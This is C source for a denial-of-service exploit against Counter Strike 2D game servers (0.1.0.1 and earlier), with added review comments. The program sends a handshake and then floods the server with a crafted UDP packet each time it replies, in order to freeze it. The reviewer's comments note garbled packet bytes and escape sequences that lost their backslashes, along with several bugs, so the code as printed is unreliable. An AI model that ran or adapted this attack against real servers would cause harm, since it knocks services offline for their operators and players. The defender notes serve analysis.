# Title : Counter Strike 2D <= 0.1.0.1 Denial of Service Vulnerability
# Published : 2005-12-11
# Author : Iman Karim
/*
Counter Strike 2D DoS
Affected versions: 0.1.0.1 and prior
CS2D Developer: http://www.cs2d.com/
by Iman Karim (iman.karim@smail.inf.fh-bonn-rhein-sieg.de)
http://home.inf.fh-rhein-sieg.de/~ikarim2s/
Written in Borland C++ Builder 6
20.09.2005
*/
#include <winsock.h>
#include <stdio.h>
#include <conio.h>
/* Shared state: one UDP socket and one destination address used by every send. */
int sd; /* socket descriptor; main assigns it from socket() */
int port = 36963; /* default destination UDP port; main replaces it with argv[2] when given */
WSADATA wsadata; /* filled in by WSAStartup() in main */
struct sockaddr_in p; /* destination address; main fills it, HandShake and DoSAttack send to it */
/*
 * NOTE(review): as printed on this page the two literals below are plain ASCII
 * text ("xFA..."). They look like hex escapes whose backslashes were lost when
 * the page was extracted -- unconfirmed. Anyone deriving a detection signature
 * for the affected server from these bytes should confirm them against an
 * authoritative copy of the advisory first.
 */
/* Datagram sent once by HandShake() before the loop in main. */
const static unsigned char MakeCon[]= "xFAxFAx0Dx0A"
"x68x61x72x72x79" // player-name field; the author gives it as "Harry" in hex
"xCEx7BxE2x45x63x90x00x00";
/* Datagram sent by DoSAttack() each time the server answers. */
const static unsigned char DoSPack[]= "xFAx04"
"x68x61x72x72x79" // same player-name field as in MakeCon
"x0Dx0Ax02" ;
//----------------------------------------------------------------------
/*
 * Look up `host` with gethostbyname() and return its first address as a
 * u_int, exactly as stored in the hostent (no byte-order conversion).
 *
 * Returns 0 after printing a message when the lookup fails. The value
 * obtained from inet_addr() is never returned: it is either replaced by
 * the gethostbyname() result or dropped on the failure path.
 */
u_int resolveaddr(char *host )
{
    u_int addr = inet_addr(host);
    struct hostent *entry = gethostbyname(host);

    if (entry == NULL) {
        printf("Cant solve hostip => quitting...n");
        return 0;
    }

    addr = *(u_int *)entry->h_addr;
    return addr;
}
/*
 * Send the MakeCon datagram once to the global destination `p` over `sd`.
 *
 * Always returns true: the sendto() result is ignored, so a failed send is
 * not reported to the caller.
 * NOTE(review): the length is a hard-coded 22 rather than derived from
 * MakeCon -- confirm it matches the array's real size, otherwise sendto()
 * reads past the end of the array.
 */
bool HandShake(int sd)
{
sendto(sd, MakeCon, 22, 0,(struct sockaddr *)&p, sizeof(p));
return true;
}
/*
 * Send the DoSPack datagram once to the global destination `p` over `sd`.
 *
 * Always returns true: the sendto() result is ignored, so a failed send is
 * not reported to the caller. The length is a hard-coded 10 rather than
 * derived from DoSPack.
 */
bool DoSAttack(int sd)
{
sendto(sd, DoSPack, 10, 0, (struct sockaddr *)&p, sizeof(p));
return true;
}
//----------------------------------------------------------------------
/*
 * Entry point: argv[1] is the server address, argv[2] an optional UDP port,
 * argv[3] an optional packet count. Prints a banner, shows usage when no
 * address is given, then sends one handshake datagram and answers each
 * datagram received from the server with one DoSPack datagram.
 *
 * For defenders: the traffic this produces is UDP to the server port
 * (36963 unless overridden), one handshake datagram followed by short
 * datagrams from the same source, each sent in response to a server reply.
 *
 * The bare "n" inside the printf strings looks like a newline escape whose
 * backslash was lost in extraction -- same caveat as for the packet arrays.
 * `bool` and the `for (int i ...)` declaration need a C++ compiler; the file
 * header says it was built with Borland C++ Builder 6.
 */
int main(int argc, char *argv[])
{
printf ("Counter Strike 2D DoSn");
printf ("Affected versions: 0.1.0.1 and priorn");
printf ("by Iman Karim (iman.karim@smail.inf.fh-bonn-rhein-sieg.de)n");
printf ("http://home.inf.fh-rhein-sieg.de/~ikarim2s/n-----------n");
/* No server address supplied: print usage, wait for a key, exit. */
if (argc <= 1)
{
printf ("n-Quick Guide-nn");
printf ("%s <SRV_IP> [SRV_PORT] [PACKET_COUNT]n",argv[0]);
printf ("Default Port is 36963n");
printf ("Default Packet Count is 5000n");
printf ("n- -nnPress a key...");
getch();
printf ("n");
return(0);
}
/* NOTE(review): the WSAStartup() result is not checked. */
WSAStartup(MAKEWORD (1,0), &wsadata);
sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if(sd < 0)
{
printf ("Cant create socket => quitting...n");
return(0);
}
/* atoi() does no validation: a non-numeric port argument silently becomes 0. */
if(argc > 2) port = atoi(argv[2]);
/* NOTE(review): resolveaddr() returns 0 on failure and that is not checked
   here, so a failed lookup leaves the destination address as 0. */
p.sin_addr.s_addr = resolveaddr(argv[1]);
p.sin_port = htons(port);
p.sin_family = AF_INET;
printf ("Attacking %s:%i...n",argv[1],port);
printf ("+Attack started...n");
printf ("++Sending Handshake...n");
HandShake(sd);
unsigned char rbuf[1024];
ZeroMemory(rbuf, 1024);
int cnt=0; /* never used */
int pcount = 5000;
/* NOTE(review): the guard tests argc > 2 but reads argv[3]. With exactly two
   arguments argv[3] is NULL and atoi(NULL) is undefined behaviour; the guard
   presumably should be argc > 3. */
if(argc > 2) pcount = atoi(argv[3]);
printf("nn[!!!] IF THE SERVER DON'T RESPONSE PRESS CTRL+C [!!!]nn");
/* Runs pcount + 1 times because of the <= comparison. */
for(int i=0;i<=pcount;i++){
printf("+++Sending packet nr.%i...n",i);
/* Blocks until a datagram arrives; no timeout is set anywhere in this file,
   which is why the message above tells the user to press CTRL+C. The
   sender's address is not captured (NULL, NULL), so any datagram arriving
   on this socket counts as a server response. */
int len=recvfrom(sd, rbuf, sizeof(rbuf), 0, NULL, NULL);
if (len > 0)
{
printf("+++(%i)Server Respondedn",i);
printf("+++(%i)Sending DoS Packetn",i);
DoSAttack(sd);
}
}
/* NOTE(review): the socket is never closed and WSACleanup() is never called. */
printf("++Attack Done!n");
printf("+Server should be frozen...n");
printf("Done => quitting.npress any key...n");
getch();
return 0;
}